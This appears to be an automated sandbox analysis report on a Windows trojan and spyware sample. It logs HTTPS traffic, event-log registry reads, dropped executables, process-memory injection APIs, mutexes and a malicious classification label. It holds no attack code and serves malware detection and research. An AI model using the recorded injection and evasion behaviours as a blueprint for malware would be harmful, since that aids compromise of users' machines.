                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49717 version: TLS 1.2
                      Source: C:\Users\user\AppData\Roaming\a.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Reads the Security eventlog
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Reads the System eventlog
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07310998 CreateDesktopW,11_2_07310998

                      System Summary

                      barindex
                      .NET source code contains very large array initializations
                      Source: a.exe.0.dr, eZqE4dDZtWpFVNxvud.csLarge array initialization: EM50SpcLt: array initializer size 360944
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeFile dump: license.exe.16.dr 280297185Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeFile dump: hosts.exe.17.dr 290654544Jump to dropped file
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07316460 NtQueryInformationProcess,11_2_07316460
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073163A8 NtWow64WriteVirtualMemory64,11_2_073163A8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07317200 NtWow64QueryInformationProcess64,11_2_07317200
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07317E29 NtWow64WriteVirtualMemory64,11_2_07317E29
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073171F8 NtWow64QueryInformationProcess64,11_2_073171F8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07318860 NtQueryInformationProcess,11_2_07318860
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_06019118 NtResumeThread,16_2_06019118
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_06019110 NtResumeThread,16_2_06019110
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeCode function: 0_2_031CD5DC0_2_031CD5DC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeCode function: 0_2_06E20CD00_2_06E20CD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02C8B4D01_2_02C8B4D0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02C8B4C01_2_02C8B4C0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_085A3E981_2_085A3E98
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_031617A011_2_031617A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0316111811_2_03161118
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0316110F11_2_0316110F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05722B6811_2_05722B68
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05722B4D11_2_05722B4D
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F951811_2_058F9518
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F49A011_2_058F49A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F8D9711_2_058F8D97
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F8DA811_2_058F8DA8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F950711_2_058F9507
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F97A411_2_058F97A4
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F963911_2_058F9639
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058F499011_2_058F4990
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059A1CA811_2_059A1CA8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059A0C0011_2_059A0C00
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059A0F3711_2_059A0F37
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C332811_2_059C3328
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C6CB011_2_059C6CB0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C5F9811_2_059C5F98
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C1A4811_2_059C1A48
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C67B011_2_059C67B0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C67A011_2_059C67A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C360F11_2_059C360F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C903811_2_059C9038
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C904811_2_059C9048
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C6C9F11_2_059C6C9F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C5F8B11_2_059C5F8B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_059C5F6311_2_059C5F63
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB47B811_2_05CB47B8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB81D011_2_05CB81D0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CBA0B011_2_05CBA0B0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB53D011_2_05CB53D0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB1FC011_2_05CB1FC0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB81C011_2_05CB81C0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB211811_2_05CB2118
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CBA0A011_2_05CBA0A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB20BC11_2_05CB20BC
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB604811_2_05CB6048
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB232411_2_05CB2324
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB4B0011_2_05CB4B00
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB8ABA11_2_05CB8ABA
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB12DA11_2_05CB12DA
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB12E811_2_05CB12E8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CBBCE711_2_05CBBCE7
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CBBCF811_2_05CBBCF8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB1FB011_2_05CB1FB0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0619BEB811_2_0619BEB8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0619D28811_2_0619D288
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731A79011_2_0731A790
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731478011_2_07314780
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731378011_2_07313780
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731C6B011_2_0731C6B0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07318DD811_2_07318DD8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07314C4011_2_07314C40
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731C30811_2_0731C308
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731AB7C11_2_0731AB7C
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731EB4011_2_0731EB40
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731373311_2_07313733
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731EF2B11_2_0731EF2B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731377011_2_07313770
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731477211_2_07314772
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731876411_2_07318764
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07318FF811_2_07318FF8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07316FDB11_2_07316FDB
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731C6A211_2_0731C6A2
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073196C711_2_073196C7
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07318DC911_2_07318DC9
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731EC9B11_2_0731EC9B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07311C8D11_2_07311C8D
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731F48F11_2_0731F48F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731EB2F11_2_0731EB2F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073103E811_2_073103E8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731F27B11_2_0731F27B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731CAB411_2_0731CAB4
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731CAAB11_2_0731CAAB
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731C2D811_2_0731C2D8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731A98411_2_0731A984
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731481E11_2_0731481E
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731906811_2_07319068
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731905A11_2_0731905A
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731384111_2_07313841
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731F09411_2_0731F094
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0731E08B11_2_0731E08B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DCA0711_2_073DCA07
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D990B11_2_073D990B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DCE3711_2_073DCE37
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D3DD411_2_073D3DD4
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DCC7511_2_073DCC75
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D34AA11_2_073D34AA
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DE27D11_2_073DE27D
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DCA7211_2_073DCA72
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073DA11411_2_073DA114
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D00AE11_2_073D00AE
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750EF1011_2_0750EF10
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750E71A11_2_0750E71A
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07509D3811_2_07509D38
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075028C011_2_075028C0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075020E011_2_075020E0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07509F5B11_2_07509F5B
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750EF0A11_2_0750EF0A
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750EFBE11_2_0750EFBE
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07509CB711_2_07509CB7
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750531111_2_07505311
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07506A2011_2_07506A20
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07506A0F11_2_07506A0F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07506A2011_2_07506A20
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750F28511_2_0750F285
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750295C11_2_0750295C
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750E97911_2_0750E979
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750217C11_2_0750217C
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075049A011_2_075049A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075020D011_2_075020D0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750F09311_2_0750F093
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0750F09F11_2_0750F09F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075028B211_2_075028B2
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07511B8E11_2_07511B8E
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0751D3A011_2_0751D3A0
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075118E811_2_075118E8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07511BD311_2_07511BD3
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0751224011_2_07512240
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0751C21111_2_0751C211
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_0751223011_2_07512230
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07511A9A11_2_07511A9A
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075118E811_2_075118E8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075118D811_2_075118D8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 12_2_00007FFC39690E6612_2_00007FFC39690E66
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 12_2_00007FFC396912F512_2_00007FFC396912F5
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316EC6816_2_0316EC68
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316198016_2_03161980
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316A93016_2_0316A930
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316A92A16_2_0316A92A
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316B29D16_2_0316B29D
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0316B2B816_2_0316B2B8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03161BCC16_2_03161BCC
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03161C1F16_2_03161C1F
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03161C7D16_2_03161C7D
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03332C2816_2_03332C28
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0333305916_2_03333059
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_033307D816_2_033307D8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0333543D16_2_0333543D
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03334CF016_2_03334CF0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03334CE016_2_03334CE0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03349A8016_2_03349A80
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_033421ED16_2_033421ED
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334683A16_2_0334683A
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334A82816_2_0334A828
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03347C5816_2_03347C58
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334DCF016_2_0334DCF0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03349A7016_2_03349A70
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334103016_2_03341030
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334102016_2_03341020
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334E01716_2_0334E017
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334A81816_2_0334A818
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334000616_2_03340006
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334678116_2_03346781
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_033467D216_2_033467D2
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_033466B016_2_033466B0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_033466A016_2_033466A0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0334EEF816_2_0334EEF8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03346C1A16_2_03346C1A
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03347C4816_2_03347C48
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_05FF13A816_2_05FF13A8
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_05FFDD9016_2_05FFDD90
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_06011C2016_2_06011C20
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_06011C1E16_2_06011C1E
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_07C5EDD016_2_07C5EDD0
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_07C5F08816_2_07C5F088
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_07C5DD4016_2_07C5DD40
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_07C4004016_2_07C40040
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_07C4000616_2_07C40006
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F1EC6821_2_00F1EC68
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F1A93021_2_00F1A930
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F1A92421_2_00F1A924
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F1B2B821_2_00F1B2B8
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F11BCC21_2_00F11BCC
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F11C7D21_2_00F11C7D
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_00F11C1F21_2_00F11C1F
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BB2C2821_2_02BB2C28
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BB305921_2_02BB3059
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BB4CF021_2_02BB4CF0
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BB4CE321_2_02BB4CE3
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC9A8021_2_02BC9A80
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC683A21_2_02BC683A
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC21ED21_2_02BC21ED
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BCDCF021_2_02BCDCF0
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC7C5821_2_02BC7C58
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC9A7021_2_02BC9A70
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC103021_2_02BC1030
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BCA82821_2_02BCA828
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC102021_2_02BC1020
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BCA81821_2_02BCA818
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BCE01721_2_02BCE017
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC66B021_2_02BC66B0
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC66A021_2_02BC66A0
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BCEEF821_2_02BCEEF8
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC678121_2_02BC6781
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC67D221_2_02BC67D2
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC6C1A21_2_02BC6C1A
                      Source: C:\Users\user\AppData\Roaming\license.exeCode function: 21_2_02BC7C4821_2_02BC7C48
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\a.exe 2678FF9E7DE004631E19523D40153B6C04C7A88732CA15E283B0F970ADCB18EF
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1331006833.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141884171.0000000000F56000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAml.exe4 vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003336000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAml.exe4 vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r,\\StringFileInfo\\000004B0\\OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.Automation.dllv+ vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r,\\StringFileInfo\\000004B0\\OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003620000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHklqepwe.exe" vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: a.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@45/18@13/9
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeFile created: C:\Users\user\AppData\Roaming\a.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hosts.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMutant created: \Sessions\1\BaseNamedObjects\f7de704b9889b0df737152
                      Source: C:\Users\user\AppData\Roaming\a.exeMutant created: \Sessions\1\BaseNamedObjects\84494b6758e480d9
